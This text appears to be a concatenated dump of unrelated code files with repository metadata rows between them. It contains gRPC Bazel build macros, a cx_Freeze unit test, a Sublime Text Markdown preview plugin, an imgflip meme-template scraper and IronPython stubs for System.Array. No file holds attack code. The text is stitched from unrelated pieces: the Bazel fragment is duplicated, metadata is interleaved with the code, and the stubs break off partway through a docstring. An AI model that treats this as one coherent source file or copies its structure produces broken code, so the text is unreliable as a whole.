external_deps = [],
testonly = False,
python_version = "PY2",
**kwargs):
native.py_binary(
name = name,
srcs = srcs,
testonly = testonly,
data = data,
deps = deps + _get_external_deps(external_deps),
python_version = python_version,
**kwargs
)
def grpc_package(name, visibility = "private", features = []):
if visibility == "tests":
visibility = ["//test:__subpackages__"]
elif visibility == "public":
visibility = ["//visibility:public"]
elif visibility == "private":
visibility = []
else:
fail("Unknown visibility " + visibility)
if len(visibility) != 0:
native.package(
default_visibility = visibility,
features = features,
)
def grpc_objc_library(
name,
srcs = [],
hdrs = [],
textual_hdrs = [],
data = [],
deps = [],
defines = [],
includes = [],
visibility = ["//visibility:public"]):
"""The grpc version of objc_library, only used for the Objective-C library compilation
Args:
name: name of target
hdrs: public headers
srcs: all source files (.m)
textual_hdrs: private headers
data: any other bundle resources
defines: preprocessors
includes: added to search path, always [the path to objc directory]
deps: dependencies
visibility: visibility, default to public
"""
native.objc_library(
name = name,
hdrs = hdrs,
srcs = srcs,
textual_hdrs = textual_hdrs,
data = data,
deps = deps,
defines = defines,
includes = includes,
visibility = visibility,
)
def grpc_upb_proto_library(name, deps):
upb_proto_library(name = name, deps = deps)
def python_config_settings():
native.config_setting(
name = "python3",
flag_values = {"@bazel_tools//tools/python:python_version": "PY3"},
)
| 31.126761
| 253
| 0.549864
|
# the BUILD file for gRPC. It contains the mapping for the template system we
# use to generate other platform's build system files.
# each change must be ported from one to the other.
#
load("//bazel:cc_grpc_library.bzl", "cc_grpc_library")
load("@upb//bazel:upb_proto_library.bzl", "upb_proto_library")
load("@build_bazel_rules_apple//apple:ios.bzl", "ios_unit_test")
# The set of pollers to test against if a test exercises polling
POLLERS = ["epollex", "epoll1", "poll"]
def if_not_windows(a):
return select({
"//:windows": [],
"//:windows_msvc": [],
"//conditions:default": a,
})
def if_mac(a):
return select({
"//:mac_x86_64": a,
"//conditions:default": [],
})
def _get_external_deps(external_deps):
ret = []
for dep in external_deps:
if dep == "address_sorting":
ret += ["//third_party/address_sorting"]
elif dep == "cares":
ret += select({
"//:grpc_no_ares": [],
"//conditions:default": ["//external:cares"],
})
elif dep == "cronet_c_for_grpc":
ret += ["//third_party/objective_c/Cronet:cronet_c_for_grpc"]
elif dep.startswith("absl/"):
ret += ["@com_google_absl//" + dep]
else:
ret += ["//external:" + dep]
return ret
def grpc_cc_library(
name,
srcs = [],
public_hdrs = [],
hdrs = [],
external_deps = [],
deps = [],
standalone = False,
language = "C++",
testonly = False,
visibility = None,
alwayslink = 0,
data = [],
use_cfstream = False,
tags = []):
copts = []
if use_cfstream:
copts = if_mac(["-DGRPC_CFSTREAM"])
if language.upper() == "C":
copts = copts + if_not_windows(["-std=c99"])
linkopts = if_not_windows(["-pthread"])
if use_cfstream:
linkopts = linkopts + if_mac(["-framework CoreFoundation"])
native.cc_library(
name = name,
srcs = srcs,
defines = select({
"//:grpc_no_ares": ["GRPC_ARES=0"],
"//conditions:default": [],
}) +
select({
"//:remote_execution": ["GRPC_PORT_ISOLATED_RUNTIME=1"],
"//conditions:default": [],
}) +
select({
"//:grpc_allow_exceptions": ["GRPC_ALLOW_EXCEPTIONS=1"],
"//:grpc_disallow_exceptions": ["GRPC_ALLOW_EXCEPTIONS=0"],
"//conditions:default": [],
}) +
if_mac(["INSTALL_PREFIX=/usr/local"]),
hdrs = hdrs + public_hdrs,
deps = deps + _get_external_deps(external_deps),
copts = copts,
visibility = visibility,
testonly = testonly,
linkopts = linkopts,
includes = [
"include",
"src/core/ext/upb-generated", # Once upb code-gen issue is resolved, remove this.
],
alwayslink = alwayslink,
data = data,
tags = tags,
)
def grpc_proto_plugin(name, srcs = [], deps = []):
native.cc_binary(
name = name,
srcs = srcs,
deps = deps,
)
def grpc_proto_library(
name,
srcs = [],
deps = [],
well_known_protos = False,
has_services = True,
use_external = False,
generate_mocks = False):
cc_grpc_library(
name = name,
srcs = srcs,
deps = deps,
well_known_protos = well_known_protos,
proto_only = not has_services,
use_external = use_external,
generate_mocks = generate_mocks,
)
def ios_cc_test(
name,
tags = [],
**kwargs):
ios_test_adapter = "//third_party/objective_c/google_toolbox_for_mac:GTM_GoogleTestRunner_GTM_USING_XCTEST"
test_lib_ios = name + "_test_lib_ios"
ios_tags = tags + ["manual", "ios_cc_test"]
if not any([t for t in tags if t.startswith("no_test_ios")]):
native.objc_library(
name = test_lib_ios,
srcs = kwargs.get("srcs"),
deps = kwargs.get("deps"),
copts = kwargs.get("copts"),
tags = ios_tags,
alwayslink = 1,
testonly = 1,
)
ios_test_deps = [ios_test_adapter, ":" + test_lib_ios]
ios_unit_test(
name = name + "_on_ios",
size = kwargs.get("size"),
tags = ios_tags,
minimum_os_version = "9.0",
deps = ios_test_deps,
)
def grpc_cc_test(name, srcs = [], deps = [], external_deps = [], args = [], data = [], uses_polling = True, language = "C++", size = "medium", timeout = None, tags = [], exec_compatible_with = [], exec_properties = {}, shard_count = None, flaky = None):
copts = if_mac(["-DGRPC_CFSTREAM"])
if language.upper() == "C":
copts = copts + if_not_windows(["-std=c99"])
# NOTE: these attributes won't be used for the poller-specific versions of a test
args = {
"srcs": srcs,
"args": args,
"data": data,
"deps": deps + _get_external_deps(external_deps),
"copts": copts,
"linkopts": if_not_windows(["-pthread"]),
"size": size,
"timeout": timeout,
"exec_compatible_with": exec_compatible_with,
"exec_properties": exec_properties,
"shard_count": shard_count,
"flaky": flaky,
}
if uses_polling:
native.cc_test(
name = name,
testonly = True,
tags = (tags + [
"no_linux",
]),
**args
)
for poller in POLLERS:
native.sh_test(
name = name + "@poller=" + poller,
data = [name] + data,
srcs = [
"//test/core/util:run_with_poller_sh",
],
size = size,
timeout = timeout,
args = [
poller,
"$(location %s)" % name,
] + args["args"],
tags = (tags + ["no_windows", "no_mac"]),
exec_compatible_with = exec_compatible_with,
exec_properties = exec_properties,
shard_count = shard_count,
flaky = flaky,
)
else:
native.cc_test(name = name, tags = tags + ["no_uses_polling"], **args)
ios_cc_test(
name = name,
tags = tags,
**args
)
def grpc_cc_binary(name, srcs = [], deps = [], external_deps = [], args = [], data = [], language = "C++", testonly = False, linkshared = False, linkopts = [], tags = []):
copts = []
if language.upper() == "C":
copts = ["-std=c99"]
native.cc_binary(
name = name,
srcs = srcs,
args = args,
data = data,
testonly = testonly,
linkshared = linkshared,
deps = deps + _get_external_deps(external_deps),
copts = copts,
linkopts = if_not_windows(["-pthread"]) + linkopts,
tags = tags,
)
def grpc_generate_one_off_targets():
# In open-source, grpc_objc* libraries depend directly on //:grpc
native.alias(
name = "grpc_objc",
actual = "//:grpc",
)
def grpc_generate_objc_one_off_targets():
pass
def grpc_sh_test(name, srcs, args = [], data = []):
native.sh_test(
name = name,
srcs = srcs,
args = args,
data = data,
)
def grpc_sh_binary(name, srcs, data = []):
native.sh_binary(
name = name,
srcs = srcs,
data = data,
)
def grpc_py_binary(
name,
srcs,
data = [],
deps = [],
external_deps = [],
testonly = False,
python_version = "PY2",
**kwargs):
native.py_binary(
name = name,
srcs = srcs,
testonly = testonly,
data = data,
deps = deps + _get_external_deps(external_deps),
python_version = python_version,
**kwargs
)
def grpc_package(name, visibility = "private", features = []):
if visibility == "tests":
visibility = ["//test:__subpackages__"]
elif visibility == "public":
visibility = ["//visibility:public"]
elif visibility == "private":
visibility = []
else:
fail("Unknown visibility " + visibility)
if len(visibility) != 0:
native.package(
default_visibility = visibility,
features = features,
)
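# Hedged usage sketch: a test package's BUILD file might begin with
#
#   grpc_package(name = "test/core/end2end", visibility = "tests")
#
# which, per the mapping above, expands to
# native.package(default_visibility = ["//test:__subpackages__"]).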
def grpc_objc_library(
name,
srcs = [],
hdrs = [],
textual_hdrs = [],
data = [],
deps = [],
defines = [],
includes = [],
visibility = ["//visibility:public"]):
native.objc_library(
name = name,
hdrs = hdrs,
srcs = srcs,
textual_hdrs = textual_hdrs,
data = data,
deps = deps,
defines = defines,
includes = includes,
visibility = visibility,
)
def grpc_upb_proto_library(name, deps):
upb_proto_library(name = name, deps = deps)
def python_config_settings():
native.config_setting(
name = "python3",
flag_values = {"@bazel_tools//tools/python:python_version": "PY3"},
)
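# Hypothetical BUILD usage of the "python3" config_setting defined above
# (target and file names are placeholders):
#
#   py_library(
#       name = "compat",
#       srcs = select({
#           ":python3": ["compat_py3.py"],
#           "//conditions:default": ["compat_py2.py"],
#       }),
#   )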
| true
| true
|
f70b75fafa63025b402d17cbd62623efb90964dc
| 813
|
py
|
Python
|
test/test_misc.py
|
lexa/cx_Freeze
|
f1f35d19e8e7e821733f86b4da7814c40be3bfd9
|
[
"PSF-2.0"
] | null | null | null |
test/test_misc.py
|
lexa/cx_Freeze
|
f1f35d19e8e7e821733f86b4da7814c40be3bfd9
|
[
"PSF-2.0"
] | null | null | null |
test/test_misc.py
|
lexa/cx_Freeze
|
f1f35d19e8e7e821733f86b4da7814c40be3bfd9
|
[
"PSF-2.0"
] | 1
|
2019-05-12T13:20:31.000Z
|
2019-05-12T13:20:31.000Z
|
import os.path
import sys
from nose.tools import assert_raises
from cx_Freeze.common import ConfigError, process_path_specs
rootdir = "C:\\" if sys.platform == "win32" else "/"
def test_process_path_specs():
inp = [
os.path.join(rootdir, "foo", "bar"),
(os.path.join(rootdir, "foo", "qux"), os.path.join("baz", "xyz")),
]
outp = process_path_specs(inp)
assert outp == [
(os.path.join(rootdir, "foo", "bar"), "bar"),
(os.path.join(rootdir, "foo", "qux"), os.path.join("baz", "xyz")),
]
def test_process_path_specs_bad():
with assert_raises(ConfigError):
process_path_specs(
[(os.path.join(rootdir, "foo"), os.path.join(rootdir, "bar"))]
)
with assert_raises(ConfigError):
process_path_specs([("a", "b", "c")])
| 26.225806
| 74
| 0.606396
| true
| true
|
f70b77fb0efe1cafb20ffc7d735e9eb9e9f2742d
| 2,768
|
py
|
Python
|
st_plugins/preview.py
|
Odyseus/MarkdownEditingFork
|
13ced60c99042ffca7a91549606c616a7a603c20
|
[
"MIT"
] | null | null | null |
st_plugins/preview.py
|
Odyseus/MarkdownEditingFork
|
13ced60c99042ffca7a91549606c616a7a603c20
|
[
"MIT"
] | null | null | null |
st_plugins/preview.py
|
Odyseus/MarkdownEditingFork
|
13ced60c99042ffca7a91549606c616a7a603c20
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import webbrowser
import sublime
import sublime_plugin
from . import MDETextCommand
from . import plugin_name
from . import settings
from python_utils.misc_utils import get_system_tempdir
from python_utils.mistune_utils import md
from python_utils.sublime_text_utils.utils import get_file_path
from python_utils.sublime_text_utils.utils import get_view_context
from python_utils.sublime_text_utils.utils import substitute_variables
__all__ = [
"MdeMarkdownPreviewCommand",
"MdeMarkdownPreviewListener"
]
_html_template = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes" />
<title>Markdown Editing Fork - Preview</title>
{stylesheets}
</head>
<body>
<div class="content boxed">
{content}
</div>
</body>
</html>
"""
_stylesheet_link_template = '<link rel="stylesheet" href="{href}" />'
class StorageClass():
def __init__(self):
self.open_previews = {}
Storage = StorageClass()
class MdeMarkdownPreviewCommand(MDETextCommand):
def run(self, edit):
file_path = get_file_path(self.view)
text = self.view.substr(sublime.Region(0, self.view.size()))
if not text or not file_path:
sublime.status_message("No content to preview")
return
html_file_id = "%d-%d" % (self.view.window().id(), self.view.id())
html_file_path = os.path.join(get_system_tempdir(), plugin_name, html_file_id + ".html")
os.makedirs(os.path.dirname(html_file_path), exist_ok=True)
with open(html_file_path, "w", encoding="UTF-8") as temp_file:
temp_file.write(_html_template.format(
stylesheets=self._ody_get_stylesheets(),
content=md(text))
)
if html_file_id not in Storage.open_previews:
Storage.open_previews[html_file_id] = html_file_path
webbrowser.open(html_file_path, new=2, autoraise=True)
else:
sublime.status_message("Reload web page")
def _ody_get_stylesheets(self):
stylesheets = substitute_variables(get_view_context(
self.view), settings.get("preview_stylesheets"))
return "\n".join([_stylesheet_link_template.format(href=s)
for s in stylesheets]) if stylesheets else ""
class MdeMarkdownPreviewListener(sublime_plugin.EventListener):
def on_close(self, view):
if view and view.id() and view.window() and view.window().id():
html_file_id = "%d-%d" % (view.window().id(), view.id())
if html_file_id in Storage.open_previews:
del Storage.open_previews[html_file_id]
if __name__ == "__main__":
pass
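# A minimal standalone sketch of the temp-file preview pattern used by
# MdeMarkdownPreviewCommand above (stdlib only; preview_html is a
# hypothetical helper, not part of this plugin):
import os
import tempfile
import webbrowser

def preview_html(markup, name="preview"):
    # Write the rendered markup into the system temp dir and open it in the
    # default browser; new=2 requests a new tab where supported.
    path = os.path.join(tempfile.gettempdir(), name + ".html")
    with open(path, "w", encoding="UTF-8") as f:
        f.write(markup)
    webbrowser.open(path, new=2, autoraise=True)
    return path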
| 28.833333
| 96
| 0.680275
| true
| true
|
f70b7841faae47aa58d61ae0fc8a4215d631a15e
| 5,270
|
py
|
Python
|
data/scraper.py
|
hmartelb/meme-search
|
2042678b3a7252ba00699e7a0618aafdf2059465
|
[
"MIT"
] | 3
|
2021-06-15T17:29:32.000Z
|
2021-06-18T20:02:55.000Z
|
data/scraper.py
|
hmartelb/meme-search
|
2042678b3a7252ba00699e7a0618aafdf2059465
|
[
"MIT"
] | null | null | null |
data/scraper.py
|
hmartelb/meme-search
|
2042678b3a7252ba00699e7a0618aafdf2059465
|
[
"MIT"
] | null | null | null |
import json
import time
import os
import pandas as pd
import requests
from bs4 import BeautifulSoup
from tqdm import tqdm
def process_9gag(args):
fetched_memes = []
errors = 0
# for i in tqdm(range(args.))
pass
def process_me_dot_me(args):
pass
def templates_imgflip(args):
args.source_url = "https://imgflip.com/memetemplates"
fetched_templates = []
errors = 0
for i in tqdm(range(args.from_page, args.pages + 1)):
print(f"Requesting: {args.source_url}?page={i}")
response = requests.get(f"{args.source_url}?page={i}")
print(response)
if response.status_code != 200:
print("Bad response")
break
body = BeautifulSoup(response.text, 'html.parser')
templates = body.findAll("div", {"class": "mt-box"})
print(len(templates))
for template in templates:
try:
template_url = "https://"+template.find('img', {"class": "shadow"})['src'][2:]
template_id, template_format = os.path.splitext(template_url.split("/")[-1])
template_title = template.find("h3", {"class": "mt-title"}).find("a")
template_title = "" if template_title is None else template_title.text
template_data = {
"id": template_id,
"format": template_format,
"website": "imgflip",
"url": template_url,
"title": template_title
}
fetched_templates.append(template_data)
except Exception:
errors += 1
# time.sleep(args.delay)
print(f"Fetched: {len(fetched_templates)} templates. Found {errors} error(s).")
return fetched_templates
def process_imgflip(args):
'''
https://gist.github.com/WalterSimoncini/defca6de456bb168ada303085358bf0a
'''
fetched_memes = []
errors = 0
for i in tqdm(range(args.from_page, args.pages + 1)):
# print(f"Processing page {i}")
response = requests.get(f"{args.source_url}?page={i}")
body = BeautifulSoup(response.text, 'html.parser')
if response.status_code != 200:
# print("Something went wrong!")
break # Something went wrong (e.g. page limit)
memes = body.findAll("div", {"class": "base-unit clearfix"})
for meme in memes:
if "not-safe-for-work images" in str(meme):
continue # NSFW memes are available only to logged in users
try:
meme_url = 'https://'+meme.find("img", {"class": "base-img"})["src"][2:]
meme_id, meme_format = os.path.splitext(meme_url.split("/")[-1])
# Handle anonymous authors
meme_author = meme.find("a", {"class": "u-username"})
meme_author = "anonymous" if meme_author is None else meme_author.text
# Handle empty titles
meme_title = meme.find("h2", {"class": "base-unit-title"}).find("a")
meme_title = "" if meme_title is None else meme_title.text
meme_text = meme.find("img", {"class": "base-img"})["alt"]
meme_text = meme_text.split("|")[1].strip()
meme_data = {
"id": meme_id,
"format": meme_format,
"website": "imgflip",
"url": meme_url,
"author": meme_author,
"title": meme_title,
"text": meme_text.lower()
}
fetched_memes.append(meme_data)
except Exception:
errors += 1
time.sleep(args.delay)
print(f"Fetched: {len(fetched_memes)} memes. Found {errors} error(s).")
return fetched_memes
if __name__ == '__main__':
import argparse
ap = argparse.ArgumentParser()
# ap.add_argument("--source_url", default="https://imgflip.com/tag/programming", help="Memes list url (e.g. https://imgflip.com/meme/Bird-Box)", type=str)
ap.add_argument("--tag", required=True, type=str)#default=['programming', 'artificial intelligence', 'computer'], type=list)
ap.add_argument("--from_page", default=1, help="Initial page", type=int)
ap.add_argument("--pages", default=44, help="Maximum page number to be scraped", type=int)
ap.add_argument("--delay", default=2, help="Delay between page loads (seconds)", type=int)
ap.add_argument("-o", "--output", default="templates.tsv")
args = ap.parse_args()
# category = args.source_url.split("/")[-1].replace("-", " ")
# Get the data
data = {}
# for tag in args.tags:
print(f"Processing tag: {args.tag}")
# Get the data
# args.source_url = f"https://imgflip.com/tag/{args.tag.replace(' ', '+')}"
# data = process_imgflip(args)
# args.source_url = f"https://ww.9gag.com/search/?query={args.tag.replace(' ', '+')}"
# data = process_9gag(args)
data = templates_imgflip(args)
# Create a pd.DataFrame and save (append to existing .tsv)
df = pd.DataFrame(data)
print(df.head(20))
df.to_csv(args.output, sep='\t', index=False, mode='a')
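# Example invocation (hypothetical tag; note mode='a' above, so repeated runs
# append rows to the output TSV):
#
#   python scraper.py --tag programming --from_page 1 --pages 5 -o templates.tsv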
| 36.09589
| 158
| 0.563567
| true
| true
|
f70b78cf3d193ad5a49b7e2c944da33196938d26
| 39,984
|
py
|
Python
|
stubs.min/System/__init___parts/Array.py
|
ricardyn/ironpython-stubs
|
4d2b405eda3ceed186e8adca55dd97c332c6f49d
|
[
"MIT"
] | 1
|
2021-02-02T13:39:16.000Z
|
2021-02-02T13:39:16.000Z
|
stubs.min/System/__init___parts/Array.py
|
hdm-dt-fb/ironpython-stubs
|
4d2b405eda3ceed186e8adca55dd97c332c6f49d
|
[
"MIT"
] | null | null | null |
stubs.min/System/__init___parts/Array.py
|
hdm-dt-fb/ironpython-stubs
|
4d2b405eda3ceed186e8adca55dd97c332c6f49d
|
[
"MIT"
] | null | null | null |
class Array(object,ICloneable,IList,ICollection,IEnumerable,IStructuralComparable,IStructuralEquatable):
""" Provides methods for creating,manipulating,searching,and sorting arrays,thereby serving as the base class for all arrays in the common language runtime. """
@staticmethod
def AsReadOnly(array):
""" AsReadOnly[T](array: Array[T]) -> ReadOnlyCollection[T] """
pass
@staticmethod
def BinarySearch(array,*__args):
"""
BinarySearch[T](array: Array[T],value: T,comparer: IComparer[T]) -> int
BinarySearch[T](array: Array[T],value: T) -> int
BinarySearch[T](array: Array[T],index: int,length: int,value: T,comparer: IComparer[T]) -> int
BinarySearch[T](array: Array[T],index: int,length: int,value: T) -> int
BinarySearch(array: Array,index: int,length: int,value: object) -> int
Searches a range of elements in a one-dimensional sorted System.Array for a
value,using the System.IComparable interface implemented by each element of
the System.Array and by the specified value.
array: The sorted one-dimensional System.Array to search.
index: The starting index of the range to search.
length: The length of the range to search.
value: The object to search for.
Returns: The index of the specified value in the specified array,if value is found. If
value is not found and value is less than one or more elements in array,a
negative number which is the bitwise complement of the index of the first
element that is larger than value. If value is not found and value is greater
than any of the elements in array,a negative number which is the bitwise
complement of (the index of the last element plus 1).
BinarySearch(array: Array,value: object) -> int
Searches an entire one-dimensional sorted System.Array for a specific element,
using the System.IComparable interface implemented by each element of the
System.Array and by the specified object.
array: The sorted one-dimensional System.Array to search.
value: The object to search for.
Returns: The index of the specified value in the specified array,if value is found. If
value is not found and value is less than one or more elements in array,a
negative number which is the bitwise complement of the index of the first
element that is larger than value. If value is not found and value is greater
than any of the elements in array,a negative number which is the bitwise
complement of (the index of the last element plus 1).
BinarySearch(array: Array,index: int,length: int,value: object,comparer: IComparer) -> int
Searches a range of elements in a one-dimensional sorted System.Array for a
value,using the specified System.Collections.IComparer interface.
array: The sorted one-dimensional System.Array to search.
index: The starting index of the range to search.
length: The length of the range to search.
value: The object to search for.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or- null to use the System.IComparable implementation of each
element.
Returns: The index of the specified value in the specified array,if value is found. If
value is not found and value is less than one or more elements in array,a
negative number which is the bitwise complement of the index of the first
element that is larger than value. If value is not found and value is greater
than any of the elements in array,a negative number which is the bitwise
complement of (the index of the last element plus 1).
BinarySearch(array: Array,value: object,comparer: IComparer) -> int
Searches an entire one-dimensional sorted System.Array for a value using the
specified System.Collections.IComparer interface.
array: The sorted one-dimensional System.Array to search.
value: The object to search for.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or- null to use the System.IComparable implementation of each
element.
Returns: The index of the specified value in the specified array,if value is found. If
value is not found and value is less than one or more elements in array,a
negative number which is the bitwise complement of the index of the first
element that is larger than value. If value is not found and value is greater
than any of the elements in array,a negative number which is the bitwise
complement of (the index of the last element plus 1).
"""
pass
@staticmethod
def Clear(array,index,length):
"""
Clear(array: Array,index: int,length: int)
Sets a range of elements in the System.Array to zero,to false,or to null,
depending on the element type.
array: The System.Array whose elements need to be cleared.
index: The starting index of the range of elements to clear.
length: The number of elements to clear.
"""
pass
def Clone(self):
"""
Clone(self: Array) -> object
Creates a shallow copy of the System.Array.
Returns: A shallow copy of the System.Array.
"""
pass
@staticmethod
def ConstrainedCopy(sourceArray,sourceIndex,destinationArray,destinationIndex,length):
"""
ConstrainedCopy(sourceArray: Array,sourceIndex: int,destinationArray: Array,destinationIndex: int,length: int)
Copies a range of elements from an System.Array starting at the specified
source index and pastes them to another System.Array starting at the specified
destination index. Guarantees that all changes are undone if the copy does not
succeed completely.
sourceArray: The System.Array that contains the data to copy.
sourceIndex: A 32-bit integer that represents the index in the sourceArray at which copying
begins.
destinationArray: The System.Array that receives the data.
destinationIndex: A 32-bit integer that represents the index in the destinationArray at which
storing begins.
length: A 32-bit integer that represents the number of elements to copy.
"""
pass
@staticmethod
def ConvertAll(array,converter):
""" ConvertAll[(TInput,TOutput)](array: Array[TInput],converter: Converter[TInput,TOutput]) -> Array[TOutput] """
pass
@staticmethod
def Copy(sourceArray,*__args):
"""
Copy(sourceArray: Array,destinationArray: Array,length: Int64)
Copies a range of elements from an System.Array starting at the first element
and pastes them into another System.Array starting at the first element. The
length is specified as a 64-bit integer.
sourceArray: The System.Array that contains the data to copy.
destinationArray: The System.Array that receives the data.
length: A 64-bit integer that represents the number of elements to copy. The integer
must be between zero and System.Int32.MaxValue,inclusive.
Copy(sourceArray: Array,sourceIndex: Int64,destinationArray: Array,destinationIndex: Int64,length: Int64)
Copies a range of elements from an System.Array starting at the specified
source index and pastes them to another System.Array starting at the specified
destination index. The length and the indexes are specified as 64-bit integers.
sourceArray: The System.Array that contains the data to copy.
sourceIndex: A 64-bit integer that represents the index in the sourceArray at which copying
begins.
destinationArray: The System.Array that receives the data.
destinationIndex: A 64-bit integer that represents the index in the destinationArray at which
storing begins.
length: A 64-bit integer that represents the number of elements to copy. The integer
must be between zero and System.Int32.MaxValue,inclusive.
Copy(sourceArray: Array,destinationArray: Array,length: int)
Copies a range of elements from an System.Array starting at the first element
and pastes them into another System.Array starting at the first element. The
length is specified as a 32-bit integer.
sourceArray: The System.Array that contains the data to copy.
destinationArray: The System.Array that receives the data.
length: A 32-bit integer that represents the number of elements to copy.
Copy(sourceArray: Array,sourceIndex: int,destinationArray: Array,destinationIndex: int,length: int)
Copies a range of elements from an System.Array starting at the specified
source index and pastes them to another System.Array starting at the specified
destination index. The length and the indexes are specified as 32-bit integers.
sourceArray: The System.Array that contains the data to copy.
sourceIndex: A 32-bit integer that represents the index in the sourceArray at which copying
begins.
destinationArray: The System.Array that receives the data.
destinationIndex: A 32-bit integer that represents the index in the destinationArray at which
storing begins.
length: A 32-bit integer that represents the number of elements to copy.
"""
pass
def CopyTo(self,array,index):
"""
CopyTo(self: Array,array: Array,index: Int64)
Copies all the elements of the current one-dimensional System.Array to the
specified one-dimensional System.Array starting at the specified destination
System.Array index. The index is specified as a 64-bit integer.
array: The one-dimensional System.Array that is the destination of the elements copied
from the current System.Array.
index: A 64-bit integer that represents the index in array at which copying begins.
CopyTo(self: Array,array: Array,index: int)
Copies all the elements of the current one-dimensional System.Array to the
specified one-dimensional System.Array starting at the specified destination
System.Array index. The index is specified as a 32-bit integer.
array: The one-dimensional System.Array that is the destination of the elements copied
from the current System.Array.
index: A 32-bit integer that represents the index in array at which copying begins.
"""
pass
@staticmethod
def CreateInstance(elementType,*__args):
"""
CreateInstance(elementType: Type,*lengths: Array[int]) -> Array
Creates a multidimensional System.Array of the specified System.Type and
dimension lengths,with zero-based indexing. The dimension lengths are
specified in an array of 32-bit integers.
elementType: The System.Type of the System.Array to create.
lengths: An array of 32-bit integers that represent the size of each dimension of the
System.Array to create.
Returns: A new multidimensional System.Array of the specified System.Type with the
specified length for each dimension,using zero-based indexing.
CreateInstance(elementType: Type,*lengths: Array[Int64]) -> Array
Creates a multidimensional System.Array of the specified System.Type and
dimension lengths,with zero-based indexing. The dimension lengths are
specified in an array of 64-bit integers.
elementType: The System.Type of the System.Array to create.
lengths: An array of 64-bit integers that represent the size of each dimension of the
System.Array to create. Each integer in the array must be between zero and
System.Int32.MaxValue,inclusive.
Returns: A new multidimensional System.Array of the specified System.Type with the
specified length for each dimension,using zero-based indexing.
CreateInstance(elementType: Type,lengths: Array[int],lowerBounds: Array[int]) -> Array
Creates a multidimensional System.Array of the specified System.Type and
dimension lengths,with the specified lower bounds.
elementType: The System.Type of the System.Array to create.
lengths: A one-dimensional array that contains the size of each dimension of the
System.Array to create.
lowerBounds: A one-dimensional array that contains the lower bound (starting index) of each
dimension of the System.Array to create.
Returns: A new multidimensional System.Array of the specified System.Type with the
specified length and lower bound for each dimension.
CreateInstance(elementType: Type,length: int) -> Array
Creates a one-dimensional System.Array of the specified System.Type and length,
with zero-based indexing.
elementType: The System.Type of the System.Array to create.
length: The size of the System.Array to create.
Returns: A new one-dimensional System.Array of the specified System.Type with the
specified length,using zero-based indexing.
CreateInstance(elementType: Type,length1: int,length2: int) -> Array
Creates a two-dimensional System.Array of the specified System.Type and
dimension lengths,with zero-based indexing.
elementType: The System.Type of the System.Array to create.
length1: The size of the first dimension of the System.Array to create.
length2: The size of the second dimension of the System.Array to create.
Returns: A new two-dimensional System.Array of the specified System.Type with the
specified length for each dimension,using zero-based indexing.
CreateInstance(elementType: Type,length1: int,length2: int,length3: int) -> Array
Creates a three-dimensional System.Array of the specified System.Type and
dimension lengths,with zero-based indexing.
elementType: The System.Type of the System.Array to create.
length1: The size of the first dimension of the System.Array to create.
length2: The size of the second dimension of the System.Array to create.
length3: The size of the third dimension of the System.Array to create.
Returns: A new three-dimensional System.Array of the specified System.Type with the
specified length for each dimension,using zero-based indexing.
"""
pass
@staticmethod
def Empty():
""" Empty[T]() -> Array[T] """
pass
@staticmethod
def Exists(array,match):
""" Exists[T](array: Array[T],match: Predicate[T]) -> bool """
pass
@staticmethod
def Find(array,match):
""" Find[T](array: Array[T],match: Predicate[T]) -> T """
pass
@staticmethod
def FindAll(array,match):
""" FindAll[T](array: Array[T],match: Predicate[T]) -> Array[T] """
pass
@staticmethod
def FindIndex(array,*__args):
"""
FindIndex[T](array: Array[T],startIndex: int,count: int,match: Predicate[T]) -> int
FindIndex[T](array: Array[T],startIndex: int,match: Predicate[T]) -> int
FindIndex[T](array: Array[T],match: Predicate[T]) -> int
"""
pass
@staticmethod
def FindLast(array,match):
""" FindLast[T](array: Array[T],match: Predicate[T]) -> T """
pass
@staticmethod
def FindLastIndex(array,*__args):
"""
FindLastIndex[T](array: Array[T],startIndex: int,count: int,match: Predicate[T]) -> int
FindLastIndex[T](array: Array[T],startIndex: int,match: Predicate[T]) -> int
FindLastIndex[T](array: Array[T],match: Predicate[T]) -> int
"""
pass
@staticmethod
def ForEach(array,action):
""" ForEach[T](array: Array[T],action: Action[T]) """
pass
def GetEnumerator(self):
"""
GetEnumerator(self: Array) -> IEnumerator
Returns an System.Collections.IEnumerator for the System.Array.
Returns: An System.Collections.IEnumerator for the System.Array.
"""
pass
def GetLength(self,dimension):
"""
GetLength(self: Array,dimension: int) -> int
Gets a 32-bit integer that represents the number of elements in the specified
dimension of the System.Array.
dimension: A zero-based dimension of the System.Array whose length needs to be determined.
Returns: A 32-bit integer that represents the number of elements in the specified
dimension.
"""
pass
def GetLongLength(self,dimension):
"""
GetLongLength(self: Array,dimension: int) -> Int64
Gets a 64-bit integer that represents the number of elements in the specified
dimension of the System.Array.
dimension: A zero-based dimension of the System.Array whose length needs to be determined.
Returns: A 64-bit integer that represents the number of elements in the specified
dimension.
"""
pass
def GetLowerBound(self,dimension):
"""
GetLowerBound(self: Array,dimension: int) -> int
Gets the lower bound of the specified dimension in the System.Array.
dimension: A zero-based dimension of the System.Array whose lower bound needs to be
determined.
Returns: The lower bound of the specified dimension in the System.Array.
"""
pass
def GetUpperBound(self,dimension):
"""
GetUpperBound(self: Array,dimension: int) -> int
Gets the upper bound of the specified dimension in the System.Array.
dimension: A zero-based dimension of the System.Array whose upper bound needs to be
determined.
Returns: The upper bound of the specified dimension in the System.Array.
"""
pass
def GetValue(self,*__args):
"""
GetValue(self: Array,index1: Int64,index2: Int64) -> object
Gets the value at the specified position in the two-dimensional System.Array.
The indexes are specified as 64-bit integers.
index1: A 64-bit integer that represents the first-dimension index of the System.Array
element to get.
index2: A 64-bit integer that represents the second-dimension index of the System.Array
element to get.
Returns: The value at the specified position in the two-dimensional System.Array.
GetValue(self: Array,index: Int64) -> object
Gets the value at the specified position in the one-dimensional System.Array.
The index is specified as a 64-bit integer.
index: A 64-bit integer that represents the position of the System.Array element to
get.
Returns: The value at the specified position in the one-dimensional System.Array.
GetValue(self: Array,*indices: Array[Int64]) -> object
Gets the value at the specified position in the multidimensional System.Array.
The indexes are specified as an array of 64-bit integers.
indices: A one-dimensional array of 64-bit integers that represent the indexes
specifying the position of the System.Array element to get.
Returns: The value at the specified position in the multidimensional System.Array.
GetValue(self: Array,index1: Int64,index2: Int64,index3: Int64) -> object
Gets the value at the specified position in the three-dimensional System.Array.
The indexes are specified as 64-bit integers.
